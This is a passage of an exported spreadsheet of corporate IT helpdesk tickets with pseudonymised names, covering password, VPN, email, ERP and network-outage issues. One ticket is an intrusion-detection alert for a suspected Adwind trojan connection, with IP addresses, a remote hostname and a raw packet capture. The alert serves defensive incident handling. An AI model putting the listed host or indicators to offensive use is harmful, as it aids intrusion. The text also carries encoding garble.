he then fixed my analysis tab while we were still in chat but after doing this when i tried to select display the white boxes that i was seeing was no longer showing.  i would hit display and all i could see was my spreadsheet (no boxes).
he said he would have to do a ticket.  i've not been copied on a ticket buy i need to run this report.
before sending this email i went back into hana to see if by chance my report or problem was fixed and the analysis tab is gone again.
if you can please correct this for me.
nealxjbc owjduxai
customer service supervisor, cec infrastructure
nealxjbc.owjduxai@gmail.com&lt;mailto:nealxjbc.owjduxai@gmail.com&gt;
</t>
  </si>
  <si>
    <t>change accounts from full time employee to contractor</t>
  </si>
  <si>
    <t xml:space="preserve">hello,
effective september 5 please change merthayu and behsnjty's accounts from employees to vendors and donot deactivate their accesses.based on my conversation with khrtyujuine, snhdfihytu and suhtnhdyio, opening this ticket.
</t>
  </si>
  <si>
    <t>interface fa0/21 on company-sa-bra-sao-pollaurido-switch-c-2950-access-sw03.company.com is down since 2:25pm on 09/2/16</t>
  </si>
  <si>
    <t>interface: fastethernet0/21 Â· 1721 router embertell(61.01.52.026) on company-sa-bra-sao-pollaurido-switch-c-2950-access-sw03.company.com is down since 2:25pm on 09/2/16</t>
  </si>
  <si>
    <t>HostName_115 :volume consumed on : c:\ is more than 85% .</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_115: volume: c:drive on server is over 85% space consumed. space available: 4.5 g </t>
  </si>
  <si>
    <t>outlook email font size issue</t>
  </si>
  <si>
    <t>sdlixwmb zvygmnco</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1108 failed in job_scheduler at: 09/02/2016 15:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1108 failed in job_scheduler at: 09/02/2016 15:06:00</t>
  </si>
  <si>
    <t>vanteksj astelnqw</t>
  </si>
  <si>
    <t>network outage: , malaysia - (company) network is down since 2:16pm et on 09/02/16</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________2:16pm et on 09/02/16______________x000D_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____no_______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</si>
  <si>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cannot log into skype or vpn</t>
  </si>
  <si>
    <t>name:qjeymnzs wgpelvyn
language:
browser:microsoft internet explorer
email:qjeymnzs.wgpelvyn@gmail.com
customer number:
telephone:
summary:i cannot log into skype or vpn. this happens every time i change my password.  i will need someone to log into my computer and fix some certificates or whatever to make it work again.</t>
  </si>
  <si>
    <t>qjeymnzs wgpelvyn</t>
  </si>
  <si>
    <t>light indicator</t>
  </si>
  <si>
    <t xml:space="preserve">from: cwuospin nbhoxqpe 
sent: friday, september 02, 2016 11:48 pm
to: ouaepwnr pqnteriv; -facility; nwfodmhc exurcwkm
subject: amar re: light indicator
help desk,
please see the request below 
sincerely,
stanfghyley guhtykes, fmp
facilities manager, world headquarters
cwuospin.nbhoxqpe@gmail.com
</t>
  </si>
  <si>
    <t>zgyudxbt exrluhdb</t>
  </si>
  <si>
    <t>outlook not connecting to microsoft exchange</t>
  </si>
  <si>
    <t>vrtx at south_amerirtca  with light blinking</t>
  </si>
  <si>
    <t>vrtx at south_amerirtca  is showing orange light blinking at front panel._x000D_
please see attached file.</t>
  </si>
  <si>
    <t>reference: inplant_851936</t>
  </si>
  <si>
    <t xml:space="preserve">while trying to invoke the method java.util.list.iterator() of a null object loaded from a local variable 'locallist'. when i try to look at a configuration for a rqfhiong zkwfqagb, i get an error - while trying to invoke the method java.util.list.iterator() of a null object loaded from a local variable 'locallist'
phone; </t>
  </si>
  <si>
    <t>erp logon balancing error</t>
  </si>
  <si>
    <t>newly created emails are not getting sent, they are all going into the outbox.</t>
  </si>
  <si>
    <t>yodgaxsp ucjynprt</t>
  </si>
  <si>
    <t>erp rounding off the total of an order</t>
  </si>
  <si>
    <t xml:space="preserve">we have quotes 3116232719, 3116233894 and 3116234383, that gives me the correct unit price but the total of the entire quote is rounding off.  can this be fixed?  customers will deny payment if the total doesn't match what the unit price is.  </t>
  </si>
  <si>
    <t>iqbyrtop izpmvgfq</t>
  </si>
  <si>
    <t>this appears to be an issue with all environments.</t>
  </si>
  <si>
    <t xml:space="preserve">unable to make incoming and outgoing calls from the company phone </t>
  </si>
  <si>
    <t>cyber security - phish uacyltoe hxgaycze report september 2016</t>
  </si>
  <si>
    <t>tmjxhlwf nacglwiu</t>
  </si>
  <si>
    <t>unable to connect to network in usa, michigan</t>
  </si>
  <si>
    <t>ixwymcbz yxmoihjg</t>
  </si>
  <si>
    <t xml:space="preserve">mapping printers </t>
  </si>
  <si>
    <t>pacvbetl yptglhoe</t>
  </si>
  <si>
    <t>india company: tcl circuit packet drops since at 10:30 am est on 09/02. site is active on primary.</t>
  </si>
  <si>
    <t xml:space="preserve"> packet drops in the internet link .tcl#3060oc020916</t>
  </si>
  <si>
    <t>ft. mill cec outlook connectivity</t>
  </si>
  <si>
    <t>the majority of csrs in the usa cec work remote.  we are currently on vpn.company.com for vpn due to the upgrade.  however, our outlook is continually freezing and we have had to reboot just to get it back.</t>
  </si>
  <si>
    <t>dtwuqpmo otupcawz</t>
  </si>
  <si>
    <t xml:space="preserve">reset password </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: koahsriq.wdugqatr@gmail.com
hello,
please reset password for vvterra qlhmawgi sgwipoxn  (terralink for russia office)
Ñ ÑƒÐ²Ð°Ð¶ÐµÐ½Ð¸ÐµÐ¼,
ÐµÐ²Ð³ÐµÐ½Ð¸Ñ.
koahsriq wdugqatr,
administrative assistant.
koahsriq.wdugqatr@gmail.com&lt;mailto:koahsriq.wdugqatr@gmail.com&gt;
</t>
  </si>
  <si>
    <t>password reset for fmeozwng pfneutkg</t>
  </si>
  <si>
    <t>name:dhkovprf pltndoab
language:
browser:microsoft internet explorer
email:dhkovprf.pltndoab@gmail.com
customer number:
telephone:
summary:locked out of erp SID_34 on too many password attempts. tried to use what i know is my password but it won't let me. may be due to SID_39 access request ticket_no0435983</t>
  </si>
  <si>
    <t>infopath issue</t>
  </si>
  <si>
    <t>skype login issue : personal certificate error</t>
  </si>
  <si>
    <t>folder access.</t>
  </si>
  <si>
    <t xml:space="preserve"> x2215
summary:require jftyff bgtyrant, user name brahdthyu, to be usaed access to HostName_856.
</t>
  </si>
  <si>
    <t xml:space="preserve">distributor_tool </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: brhlcpqv.sfozwkyx@gmail.com_x000D_
_x000D_
hello,_x000D_
could you help me on entering the distributor_tool company?_x000D_
i'd already contacted with rakthyesh, and he helped me enter the system with the password he gave but it didn't still work. i've changed the password after he sent me an email but this problem couldn't be solved._x000D_
have a great day._x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>joining skype meetings through iphone</t>
  </si>
  <si>
    <t>problems with quoting engine. refer attachment.</t>
  </si>
  <si>
    <t xml:space="preserve">problems with quoting engine. refer attachment.
phone; 44 </t>
  </si>
  <si>
    <t>delegation query, owa and checking emails older than 12 months.</t>
  </si>
  <si>
    <t>urgent: samag lieferschein sales order #35612545 - fehler in batches</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vujymcls.sgpmyviq@gmail.com
hallo it,
bitte dringend um hilfe, da der lkw bereits hier zur abholung der werkzeuge vor ort steht und dringend ein lieferschein erstellt werden muss!
bitte um klÃ¤rung, danke!
[cid:image001.png@01d20529.8d8000e0]
best </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: koahsriq.wdugqatr@gmail.com_x000D_
_x000D_
hello all,_x000D_
please set the pc name for new laptop windows 7._x000D_
we're in russia office_x000D_
</t>
  </si>
  <si>
    <t>email confirmation to login to hub</t>
  </si>
  <si>
    <t>wqfnhbuz ptlqknre</t>
  </si>
  <si>
    <t>outlook profil / correction of phone number and cell phone number</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: byclpwmv.esafrtbh@gmail.com_x000D_
_x000D_
hello help team,_x000D_
_x000D_
how can i update below data in outlook. my phone-# and cell-phone-# isn't correct._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>security incidents - ( #in33765965 ) : possible adwind malware trojan - rqxl7406113</t>
  </si>
  <si>
    <t>source ip :10.40.6.221
system name :rqxl8517224
user  name:qxhdcnmj caflvjrn(vefghgarr)
location :usa
sep , sms status :no updates
field sales user ( yes / no) :  no
dsw event log:see below
=========================================================================================================================
=========================
event data
=========================
related events: 
event id: 411230755
event summary: 52046 vid70697 adwind malware ssl certificate detected (inbound)
occurrence count: 173
event count: 1
host and connection information
source ip: 191.101.151.14
source hostname: foreach-rcp.enceinjury.net.
source port: 5000
source ip geolocation: barcelona, esp
destination ip: 10.40.6.221
destination hostname: rqxl8517224 
destination port: 58471
connection directionality: incoming
protocol: tcp
device information
device ip: 10.32.100.17
device name: isensor03.company.com
log time: 2016-09-01 at 19:18:48 utc
action: not blocked
vendor eventid: 336126
cvss score: -1 
vendor priority: 1
vendor version: 7
scwx event processing information
sherlock rule id (sle): 928535
inspector rule id: 277082
inspector event id: 051975334
ontology id: 200020003203755190
event type id: 200020003203575398
agent id: 102805
event detail:
[**] [1:21163157:1] 52046 vid70697 adwind malware ssl certificate detected (inbound) [**]
[classification: none] [priority: 1] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]
[sensor id: 602982][event id: 336126][time: 2583868639.892461]
[src ip: 191.101.151.14][dst ip: 10.40.6.221][sport/itype: 5000][dport/icode: 58471][proto: 6]
09/01/2016-19:18:48.89246sartlgeo lhqksbdx91.101.151.14:5000 -&gt; 10.40.6.221:58471
tcp ttl:108 tos:0x28 id:4647 iplen:20 dgmlen:1294 df
***a**** seq: 0xef831d96 ack: 0x8da0e8db win: 0x103 tcplen: 20
==pcap 1==
[o:security]
ascii packet(s):
==pcap 1 ascii s==
.......w-...........e(...'@.l..".e...(.....g........p...........?...m..w...xos...li....d:.+ti.7u.{..f.m.w......q.3*..@\.s..o..0..4....c..'..................0...0..w........#..0...*.h........071.0...u....fr1.0...u....assylias.inc1.0...u....assylias0...150118163720z..21141235163720z071.0...u....fr1.0...u....assylias.inc1.0...u....assylias0...0...*.h.............0............v.4.........,.n.......3..c@.....w........z.%..^...u*8.|..#.p......!.8.....c....(.@.e.....b...06......q...p.{...\.tltz....,p.....~o...no.d.zw...^.x&lt;.b-..wh'......6...i...u1..:.)g...6t..b...gb...{.../.p...ac.........s.\.l.*......=.r).._......p.h.........p?..y...d....=z.#4~7&lt;cy;..}.[^'z.w&amp;..p.2..g)?.f.......g,;b.dj..oy..7..j......,.h..."h$......z).=...i.s}....o+^.|.......s..[9..?a......!0.0...u.............u.n....n!z..10...*.h.............s.d..0.*..p._?....(.qko...2........x~-..to.....|.....\.s.{.........&amp;u..f.#..i...@.hn.1.p.\..7u;.n.....*}.m....e....]....cn,.....$..i..-.).w....u..h.......c...b.....ik....5..z.h.o.'t.8a6......r.."z0.......k...gt.7#..&amp;s.^.......7{;..7....t..z..4x&gt;...v.l.o.........6...{fn!...)r..p..{..e.....`.g+.....q....i.f...p..o...m....k.&amp;_.....m.,.&amp;e.....y...j!.m......u..q.................,..z+.w........a.!.........._...lcbq.g..f............j..h."....%...n8.kd.l.i&amp;.r......g.@......|.@..,...wd..!+e.....u]..@y..
==pcap 1 ascii e==
hex packet(s):
==pcap 1 hex s==
000000 0c00 0000 187f c857 2d9e 0d00 0e05 0000 .......w-.......
000010 0e05 0000 4528 050e 1227 4000 6c06 9022 ....e(...'@.l.."
000020 bf65 970e 0a28 06dd 1388 e467 ef83 1d96 .e...(.....g....
000030 8da0 e8db 5010 0103 0c0c 0000 1603 0306 ....p...........
000040 3f02 0000 4d03 0357 c87f 1258 6f53 9c89 ?...m..w...xos..
000050 876c 69d6 beb5 c164 3ae0 2b74 6916 3755 .li....d:.+ti.7u
000060 0d7b e5ef 6698 6d20 57c8 7f12 d17f f371 .{..f.m.w......q
000070 f233 2a10 bf40 5cc6 73d1 b56f 9b8a 301d .3*..@\.s..o..0.
000080 1f34 1c1c e397 6391 c027 0000 05ff 0100 .4....c..'......
000090 0100 0b00 0419 0004 1600 0413 3082 040f ............0...
0000a0 3082 0277 a003 0201 0202 041f 239d bd30 0..w........#..0
0000b0 0d06 092a 8648 86f7 0d01 010b 0500 3037 ...*.h........07
0000c0 310b 3009 0603 5504 0613 0246 523sartlgeo lhqksbdx530 1.0...u....fr1.0
0000d0 1306 0355 040a 130c 6173 7379 6c69 6173 ...u....assylias
0000e0 2e49 6e63 3111 300f 0603 5504 0313 0861 .inc1.0...u....a
0000f0 7373 796c 6961 7330 2017 0d31 3530 3131 ssylias0...15011
000100 3730 3532 3631 395a 180f 3231 3134 3132 8163720z..211412
000110 3234 3035 3236 3139 5a30 3731 0b30 0906 35163720z071.0..
000120 0355 0406 1302 4652 3115 3013 0603 5504 .u....fr1.0...u.
000130 0a13 0c61 7373 796c 6961 732e 496e 6331 ...assylias.inc1
000140 1130 0f06 0355 0403 1308 6173 7379 6c69 .0...u....assyli
000150 6173 3082 01a2 300d 0609 2a86 4886 f70d as0...0...*.h...
000160 0101 0105 0003 8201 8f00 3082 018a 0282 ..........0.....
000170 0181 00a5 dada b576 0334 83c6 bd9f 93cc .......v.4......
000180 c418 0a2c e74e 1cb0 14eb 870b 9033 9dea ...,.n.......3..
000190 6340 b2f3 19ff 2057 eaeb bda7 10fd 2e99 c@.....w........
0001a0 5afe 259f a35e 8492 f955 2a38 f17c 928d z.%..^...u*8.|..
0001b0 23dd 70e7 a7eb 0a82 ef21 8a38 9ea4 e7b5 #.p......!.8....
0001c0 b763 8bbb bcb4 2889 4091 45c8 95a8 8583 .c....(.@.e.....
0001d0 4299 b3f0 3036 1d17 de9f c4a2 51dc aa05 b...06......q...
0001e0 501c 7bef aa1e 5c14 546c 745a b4f0 e7b9 p.{...\.tltz....
0001f0 2c50 b518 abca c97e 4f93 d47f 4e6f 7f44 ,p.....~o...no.d
000200 e97a 77c8 8817 5ed8 783c cf42 2def f677 .zw...^.x&lt;.b-..w
000210 6827 11cf 1309 f5b1 3686 b8b4 6920 ca93 h'......6...i...
000220 7531 d9ef 3aeb 2947 9310 9636 54f4 d562 u1..:.)g...6t..b
000230 fa14 9f47 42e4 d7aa 7b04 a19c 2fe3 500a ...gb...{.../.p.
000240 b1d9 6143 e80f 17ed deab 909e 9a73 965c ..ac.........s.\
000250 0c6c ad2a 9df4 8497 14b7 3dca 5229 acc1 .l.*......=.r)..
000260 5f02 b59b e51c ef50 9f48 95b9 9cfe ae93 _......p.h......
000270 cfef 0c70 3f81 8f59 8cec 0344 8803 9fb8 ...p?..y...d....
000280 3d7a db23 347e 373c 6379 3b02 867d 0b5b =z.#4~7&lt;cy;..}.[
000290 5e27 5a0d 5726 1ec5 7019 32f0 9147 293f ^'z.w&amp;..p.2..g)?
0002a0 cb46 c296 190f b8dc b367 2c3b 421a 446a .f.......g,;b.dj
0002b0 a2cf 6f59 c08c 3797 d24a a3b1 b094 ee8b ..oy..7..j......
0002c0 2c9d 48a8 c9fc 2268 248e 0c98 8ab9 8b7a ,.h..."h$......z
0002d0 2909 3da0 SID_53c 6915 737d fcd7 a61d 6f2b ).=...i.s}....o+
0002e0 5e80 7c83 d787 f3f3 8eed 5389 8e5b 3914 ^.|.......s..[9.
0002f0 973f 4102 0301 0001 a321 301f 301d 0603 .?a......!0.0...
000300 551d 0e04 1604 140b f883 9b8e e6af 75a6 u.............u.
000310 6e1c c1e8 d06e 215a 17f1 3130 0d06 092a n....n!z..10...*
000320 8648 86f7 0d01 010b 0500 0382 0181 0053 .h.............s
000330 1a64 b708 30ae 2aff f050 e15f 3ff6 a9d6 .d..0.*..p._?...
000340 bc28 d471 6b6f 11f5 8932 a8ee b814 d7d9 .(.qko...2......
000350 be80 787e 2SID_25 d654 4fad e4f6 cfec 7ca1 ..x~-..to.....|.
000360 2e08 eed8 5c18 53cb 7bbf e8f7 0ccf d99e ....\.s.{.......
000370 c4c6 2655 d30f 66ba 23e3 a049 18c6 f740 ..&amp;u..f.#..i...@
000380 f048 6ea3 3188 50e1 5c0b cd37 553b ca4e .hn.1.p.\..7u;.n
000390 f984 94d8 bb2a 7d0b 6dd5 139d f865 ef13 .....*}.m....e..
0003a0 7fd3 5dc6 e60f 8f63 4e2c 0193 e5ae 1424 ..]....cn,.....$
0003b0 1708 6991 fa2d 9e29 9d57 e98f 8ebd 7515 ..i..-.).w....u.
0003c0 c168 a790 82f9 e7d4 bf63 f387 d142 07c5 .h.......c...b..
0003d0 91fd 8049 4bf4 8fba 8635 0eb9 7a9c 4884 ...ik....5..z.h.
0003e0 6fc1 2774 b638 6136 16ca bfb9 0885 520b o.'t.8a6......r.
0003f0 d322 7a30 c604 0d84 f3ff fd6b 15d5 8967 ."z0.......k...g
000400 74ae 3723 19c4 2673 005e 9bf0 d583 dbe6 t.7#..&amp;s.^......
000410 e637 7b3b 8d8d 3714 de94 1a74 db16 5abb .7{;..7....t..z.
000420 8434 783e cac7 9c76 e44c 916f 8d8a 1bba .4x&gt;...v.l.o....
000430 cd13 d60a ef36 19cf bf7b 464e 211e 0ba3 .....6...{fn!...
000440 2972 9bb2 7016 207b 04b3 65fd 9e8e 0c18 )r..p..{..e.....
000450 6000 672b f5b8 86be c651 ede9 SID_290 49c2 `.g+.....q....i.
000460 66aa 81bd 50e6 c96f f090 906d b59e 9f98 f...p..o...m....
000470 6b16 265f cf88 99e2 bc4d 862c e826 458d k.&amp;_.....m.,.&amp;e.
000480 a89f 87a0 79c3 91bb 6a21 894d 8fb7 f084 ....y...j!.m....
000490 a5b7 75ba 0a51 b0c0 1fb0 e49f 9117 8dca ..u..q..........
0004a0 14ac bfda 04c9 d52c e301 5a2b 8f57 ad0c .......,..z+.w..
0004b0 0001 c903 0017 4104 21d8 02b7 9198 e496 ......a.!.......
0004c0 a5a8 185f eb1a a86c 6342 51ca 67c4 a646 ..._...lcbq.g..f
0004d0 a0bc a8d0 ddb4 c51b 93df e501 4af2 0c48 ............j..h
0004e0 e522 eba8 d89c 25a2 d70c 4e38 cf6b 44eb ."....%...n8.kd.
0004f0 4c90 4926 8352 d1ba 0601 0180 67a4 40cd l.i&amp;.r......g.@.
000500 878b d8f6 c37c d940 ad8c 2ce7 80f5 7764 .....|.@..,...wd
000510 f416 212b 4500 9af4 b5a9 755d f782 4059 ..!+e.....u]..@y
000520 2edb ..
==pcap 1 hex e==</t>
  </si>
  <si>
    <t xml:space="preserve">password change </t>
  </si>
  <si>
    <t>okdrsinu gvfmuxdo</t>
  </si>
  <si>
    <t>personal device set-up procedure</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uiotbkhs.grymzxiq@gmail.com_x000D_
_x000D_
team,_x000D_
_x000D_
please send me a link to the information on how i can set up a personal tablet to receive company email through exchange server._x000D_
_x000D_
i have the i.t. ticket completed but i understand i need to set up the tablet before i submit._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>1192185 is in stock at plant_249 after finishing production at plant_248.  why isn't there a delivery created to ship this item.</t>
  </si>
  <si>
    <t xml:space="preserve">1192185 is in stock at plant_249 after finishing production at plant_248.  why isn't there a delivery created to ship this item to fill customer backorder?  there was previously an issue with the system automatically processing shipments as it should._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>cannot connect to eu vpn from home. need to use it from 8am-2pm while na vpn is down</t>
  </si>
  <si>
    <t>when clicking "company_vpn" on the vpn.company website, the new window opens to show network access. after attempting to connect i get error " a connection to the remote computer could not be established, so the port used for this connection was closed"</t>
  </si>
  <si>
    <t>zlvafsxw dfzbsjui</t>
  </si>
  <si>
    <t xml:space="preserve">wifi not working </t>
  </si>
  <si>
    <t>erp access</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: qdtywmkv.aolijwnx@gmail.com
i have been given the "to many failed attempts" for logging into erp
have recently changed password checked that it was unlocked in password_management_tool and when i tried new one twice without working i tried my old password.
then after not opening came the message of to many failed attempts i need access to erp.
michghytuael t. hardman
maintenance supervisor
qdtywmkv.aolijwnx@gmail.com&lt;mailto:qdtywmkv.aolijwnx@gmail.com&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">password reset alert from o365  for user â€¢ michghytuael.white@company.com </t>
  </si>
  <si>
    <t>lhrnyktm egilutwz</t>
  </si>
  <si>
    <t>ooo till friday . crm web access. unable to load page.</t>
  </si>
  <si>
    <t>crm web access. unable to load page.</t>
  </si>
  <si>
    <t>xiaurwpz hzusljmc</t>
  </si>
  <si>
    <t xml:space="preserve">password reset request from o365 </t>
  </si>
  <si>
    <t xml:space="preserve">mobile device activation request </t>
  </si>
  <si>
    <t xml:space="preserve">not able to login to vpn : account locked out </t>
  </si>
  <si>
    <t>printer not working, pc in qa office in germany not getting connected to internet.</t>
  </si>
  <si>
    <t xml:space="preserve">printer not working, pc in qa office in germany not getting connected to internet._x000D_
_x000D_
pc name : _x000D_
olympus-SID_32073 _x000D_
_x000D_
contact name : 150, 139_x000D_
</t>
  </si>
  <si>
    <t>lsnmoqdz jawresyp</t>
  </si>
  <si>
    <t>enterprise search connector forâ€¦ is not working!!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ucphibmr.dfvkbtsj@gmail.com_x000D_
_x000D_
enterprise search connector forâ€¦ is not working!!_x000D_
_x000D_
_x000D_
[cid:image001.png@01d2050b.fa380480]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>company distributor_tool</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pnabslgh.vatpgsxn@gmail.com_x000D_
_x000D_
hi my name is pnabslgh vatpgsxn._x000D_
pls help me to use company distributor_tool_x000D_
_x000D_
_x000D_
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ã•ã„ã€‚_x000D_
[#+company/posts&gt;  [_x000D_
select the following link to view the disclaimer in an alternate language. </t>
  </si>
  <si>
    <t>pnabslgh vatpgsxn</t>
  </si>
  <si>
    <t>an prÃ¼fen \ we_wu113 \ essa presse \ box blinkt dauerhaft \wrcktgbd wzrgyunp</t>
  </si>
  <si>
    <t>setup rechnerf fÃ¼r infostand instandsetzung \niptbwdq csenjruz</t>
  </si>
  <si>
    <t>problem mit bildschirmschoner an den sinic-stationen \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t>externe festplatte zu verfÃ¼gung stellen \alte nobook festplatte \edspmloy fxnkzaqu</t>
  </si>
  <si>
    <t>edspmloy fxnkzaqu</t>
  </si>
  <si>
    <t>probleme mit portal \ghaltiek lsuepvyx</t>
  </si>
  <si>
    <t>ghaltiek lsuepvyx</t>
  </si>
  <si>
    <t>circuit outage:usa plant,na company-na-usa-usa-plant-static-vpn-4331-rtr02 went down at 04:22 am et on 09/02.</t>
  </si>
  <si>
    <t>what type of outage:  ____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    __slo site_______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______04:22 am et on 09/02.________________x000D_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__primary is active______     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ___na________   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _____na______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  __na_____     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>interface: fastethernet0/27  vlan 51: lhqwx402189sf on company-na-usa-usa-switch-cl04-3-2960-access-sw03 is down.</t>
  </si>
  <si>
    <t xml:space="preserve">interface: fastethernet0/27 Â· vlan 51: lhqwx402189sf on company-na-usa-usa-switch-cl04-3-2960-access-sw03.company.com is down </t>
  </si>
  <si>
    <t xml:space="preserve">i get warehouse_toolmails meant for efbwiadp dicafxhv </t>
  </si>
  <si>
    <t>please check why warehouse_toolmails for efbwiadp dicafxhv are getting emailed to me. trurthyuft has not received any of the emails. please check attachments.</t>
  </si>
  <si>
    <t>password_management_tool password manager login issue</t>
  </si>
  <si>
    <t>+76
summary:
i tried use password_management_tool manager to change password
when i enter new paasword it prompts  me no activex
when i click install it give me error</t>
  </si>
  <si>
    <t>gimkwnvs wpjmocut</t>
  </si>
  <si>
    <t>configure shared mailbox</t>
  </si>
  <si>
    <t>need to add two mailboxes to outlook (still working with outlook 2010) .companyfoundation@kcompany.com and .relations@company.com but doesn't work.</t>
  </si>
  <si>
    <t>skype add in is not showing up in outlook.</t>
  </si>
  <si>
    <t>skype add in is not showing up in outlook. _x000D_
also when manually activated.</t>
  </si>
  <si>
    <t>mobile device activation ; company provided.</t>
  </si>
  <si>
    <t>f drive on rqxsm004 is over 85% space consumed. space available: 3.9 gb</t>
  </si>
  <si>
    <t>volume: f:\ label:dat2-rqxsm004 dc86ed35 on server: rqxsm004 is over 85% space consumed. space available: 3.9 gb</t>
  </si>
  <si>
    <t>ethernet</t>
  </si>
  <si>
    <t>ethernet not working. only wi-fi.</t>
  </si>
  <si>
    <t>ç­”å¤: 35969737/2032252</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wqzarvhx.hfsojckw@gmail.com_x000D_
_x000D_
hi, help_x000D_
_x000D_
pls check item 20, net value in condition table is 17rmb. but shows  34rmb on the view of item overview, pls correct, </t>
  </si>
  <si>
    <t xml:space="preserve">outlook not responding </t>
  </si>
  <si>
    <t>adoption score card is not visible in crm dynamics  : insufficient permission to access</t>
  </si>
  <si>
    <t>962
summary:adoption score card is not visible in crm dynamics 
user is trying to access crm adoption card for first time.</t>
  </si>
  <si>
    <t>SID_1 is not working.</t>
  </si>
  <si>
    <t>SID_1 is not working. _x000D_
error  : no connection to server.</t>
  </si>
  <si>
    <t>na remote is not working</t>
  </si>
  <si>
    <t xml:space="preserve">[â€Ž9/â€Ž2/â€Ž2016 12:06 pm] mhfjudahdyue rfgrhtdy: 
hi manjgtiry
[â€Ž9/â€Ž2/â€Ž2016 12:06 pm] dwfiykeo argtxmvcumar3: 
hello
[â€Ž9/â€Ž2/â€Ž2016 12:06 pm] mhfjudahdyue rfgrhtdy: 
na remote is not working
can you verify
eu remote is working
[â€Ž9/â€Ž2/â€Ž2016 12:07 pm] dwfiykeo argtxmvcumar3: 
ok
let me check
[â€Ž9/â€Ž2/â€Ž2016 12:09 pm] mhfjudahdyue rfgrhtdy: 
ok
[â€Ž9/â€Ž2/â€Ž2016 12:10 pm] dwfiykeo argtxmvcumar3: 
are you getting some error ?
[â€Ž9/â€Ž2/â€Ž2016 12:10 pm] mhfjudahdyue rfgrhtdy: 
not able to connect vpn
[â€Ž9/â€Ž2/â€Ž2016 12:11 pm] dwfiykeo argtxmvcumar3: 
ok
let me create a ticket
[â€Ž9/â€Ž2/â€Ž2016 12:13 pm] dwfiykeo argtxmvcumar3: 
can you try if it is working ?
[â€Ž9/â€Ž2/â€Ž2016 12:13 pm] mhfjudahdyue rfgrhtdy: 
eu is working
i am on eu now
[â€Ž9/â€Ž2/â€Ž2016 12:13 pm] dwfiykeo argtxmvcumar3: 
ok
this is new asia vpn remote
if you have time just try it 
[â€Ž9/â€Ž2/â€Ž2016 12:15 pm] mhfjudahdyue rfgrhtdy: 
sure
[â€Ž9/â€Ž2/â€Ž2016 12:16 pm] dwfiykeo argtxmvcumar3: 
</t>
  </si>
  <si>
    <t>sto 5019179518 is for 2 pcs of material 6316883. delivery 9169190868 created for 1 pc.</t>
  </si>
  <si>
    <t xml:space="preserve">debbie smhdyhti gets an error message </t>
  </si>
  <si>
    <t>rugphfdi trlshejc</t>
  </si>
  <si>
    <t>display an festtelefon der nummer 311 im cvd anlagenbereich defekt. telefon bitte erneuern.</t>
  </si>
  <si>
    <t>pjrcbhln qznblemc</t>
  </si>
  <si>
    <t>could find old email from year 2012 in microsoft outlook</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wsimcqzt.xvwzbdhq@gmail.com_x000D_
_x000D_
hello,_x000D_
only till february 2015  ?_x000D_
_x000D_
[cid:image001.png@01d204f3.6ecda2a0]_x000D_
_x000D_
mit freundlichen grugermany / with best </t>
  </si>
  <si>
    <t>wsimcqzt xvwzbdhq</t>
  </si>
  <si>
    <t>mobile device activation successfully done.</t>
  </si>
  <si>
    <t>request for stop/ delete the dtp job in SID_37</t>
  </si>
  <si>
    <t xml:space="preserve">hi team basis,_x000D_
_x000D_
please stop/ delete the job bidengineering_tool_2619536_1 in SID_37 system._x000D_
_x000D_
the job was triggered to uacyltoe hxgaycze the value of one of the complaint cube transaction in bw system. as the result is found, hence please stop the respective job._x000D_
_x000D_
email is sent to team._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>not able to connect to  outlook - getting security alert about security certificate</t>
  </si>
  <si>
    <t>_x000D_
not able to connect to out look- please see the screen shot and do needful.</t>
  </si>
  <si>
    <t>xyodfqhk wgymhail</t>
  </si>
  <si>
    <t>sd_sales_order* jobs abended in job_scheduler due to "logon of user coferte in client 120 failed when starting a step"</t>
  </si>
  <si>
    <t xml:space="preserve">access to run-books (dot net and plm solutioning) </t>
  </si>
  <si>
    <t xml:space="preserve">hi,
kindly usa pagthyuathy afghtyjith , userid "vvdfgtyuji" access to run-books(dot net and plm solutioning).
</t>
  </si>
  <si>
    <t>stock issue for mm 1113198</t>
  </si>
  <si>
    <t xml:space="preserve">hello christgrytoph_x000D_
_x000D_
this kind situation came up again, i'm wondering, is it a good way to run the dn? _x000D_
please see the screen below, </t>
  </si>
